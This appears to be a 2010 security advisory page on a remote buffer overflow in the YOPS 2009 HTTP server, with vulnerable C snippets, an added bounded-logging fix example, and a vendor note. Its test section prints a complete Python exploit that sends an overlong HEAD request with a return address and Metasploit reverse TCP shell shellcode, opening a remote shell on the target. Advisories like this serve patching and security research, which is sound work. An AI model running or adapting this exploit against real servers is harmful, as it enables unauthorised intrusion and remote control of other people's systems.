Date: 2010-09-16 00:23:00  Source: compiled by this site

YOPS Server HTTP Request Remote Overflow Vulnerability and Fix [Network Technology]


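Affected versions:
yoopss YOPS 2009

Vulnerability description:
YOPS (Your Own Personal [WEB] Server) is an HTTP server for Linux written in C.

The http_parse_request_header function of the YOPS server performs no bounds check on the buffer received from an HTTP command (HEAD/GET/POST) before that data is used as an argument for the logger variable in the swebs_record_log function. An overlong request parameter can trigger a buffer overflow, leading to arbitrary code execution. The vulnerable code segments are shown below: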

--- http.c snippet ---

int http_parse_request_header(char *data, struct http_request_header *h)
{
       int r;
       int ver, rev;
       char *s, *tok, *l, *prm;
[...]
       r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev);
       if (r != 2)
               return -400;
[...]
}
--- END snippet ---

--- swebs.c snippet ---

int swebs_record_log(int log, JOB *job)
{
       int err;
       time_t now;
       char timestr[32];
       char logrec[MAX_REQUEST_LINE_LEN + 1];
[...]
       sprintf (
               logrec,
               "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d",
               job->client,
               timestr,
               job->hdr.request_line,
               job->response_hlen,
               job->response_blen_sent,
               job->response_blen,
               job->status
               );
[...]
}
--- END snippet ---

<*Reference
Rodrigo Escobar (ipax@dclabs.com.br)

http://marc.info/?l=bugtraq&m=128415017107354&w=2
*>
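
Added example (not YOPS code and not a vendor patch): a bounded form of the logging call from the swebs.c snippet, in C. The value of MAX_REQUEST_LINE_LEN, struct job_view, check_request_line, the -414 status and format_log_record are assumptions made for illustration. It also shows that capping the request line alone is not enough, because logrec has to hold the client, timestamp and counters as well.

```c
#include <stdio.h>
#include <string.h>

/* Assumed value: the page does not show how YOPS defines this constant. */
#define MAX_REQUEST_LINE_LEN 1024

/* Reduced stand-in for the JOB fields used by the page's log format. */
struct job_view {
    const char *client, *request_line;
    int response_hlen, response_blen_sent, response_blen, status;
};

/* Hypothetical parse-time guard (negative status, like -400 on the page). */
int check_request_line(const char *line)
{
    return strlen(line) > MAX_REQUEST_LINE_LEN ? -414 : 0;
}

/* Bounded form of the page's sprintf call. Returns the record length, or -1
 * when the record does not fit; out is then a NUL-terminated prefix. */
int format_log_record(char *out, size_t outsz, const char *timestr,
                      const struct job_view *job)
{
    int n = snprintf(out, outsz, "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d",
                     job->client, timestr, job->request_line,
                     job->response_hlen, job->response_blen_sent,
                     job->response_blen, job->status);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

/* Constructed input: a request line of exactly the maximum length. Returns
 * 1 when the guard accepts it but the record still exceeds logrec. */
int max_length_line_still_overflows(void)
{
    char logrec[MAX_REQUEST_LINE_LEN + 1];      /* sized as on the page */
    char line[MAX_REQUEST_LINE_LEN + 1];
    struct job_view job = { "127.0.0.1", line, 0, 0, 0, 400 };

    memset(line, 'A', MAX_REQUEST_LINE_LEN);
    line[MAX_REQUEST_LINE_LEN] = '\0';
    return check_request_line(line) == 0 &&
           format_log_record(logrec, sizeof logrec, "16/Sep/2010", &job) == -1;
}

int main(void)
{
    printf("overflow without bound: %d\n", max_length_line_still_overflows());
    return 0;
}
```

A caller that gets -1 can log the truncated prefix or drop the record; either way nothing is written past the end of the buffer.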
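Test method:

The programs (methods) provided by this site may be offensive in nature and are intended for security research and teaching only; use at your own risk!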
#!/usr/bin/python
# Software:
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP server for Linux OS written in C.
# URL: http://sourceforge.net/projects/yops2009/
#
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
# Contact: waKKu <AT> dclabs <DOT> com <DOT> br
 
HOST = "localhost"
PORT = 8888
 
import socket
import sys
import time
 
try:
    BUFF_LEN = int(sys.argv[1])
except:
    BUFF_LEN = 802
FIXUP_ADDR = "\x47\xce\x04\x08"
 
shellcode = (
# MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444
"\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4"
"\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0"
"\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a"
"\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3"
"\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d"
"\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0"
"\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43"
)
 
buffer = "HEAD "
buffer += "A"*BUFF_LEN
buffer += FIXUP_ADDR*4
buffer += " HTTP/1.1"
 
stackadjust = (
"\xcb" # instruction alignment
"\xbc\x69\x69\x96\xb0" # Stack Adjustment
)
 
payload = buffer + stackadjust + shellcode + "\r\n\r\n"
 
print """
######################################
### DcLabs Security Research Group ###
### +Exploit+ ###
######################################
Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu
Greetings to: All DcLabs members
"""
 
print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print " [+] Trying to establish connection..."
s.connect((HOST, PORT))
print " [+] Sending a dummy request to initialize data..."
s.send("HEAD DcLabs HTTP/1.1\r\n\r\n")
try:
    s.recv(1024)
except:
    pass
s.close()
 
time.sleep(3)
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print " [+] Sending our malicious payload..."
s.send(payload)
print " [+] Payload sent, good luck!"
s.close()

Vendor patch:

yoopss
------
We recommend that users of this software keep watching the vendor's home page to obtain the latest version:

http://sourceforge.net/projects/yops2009/

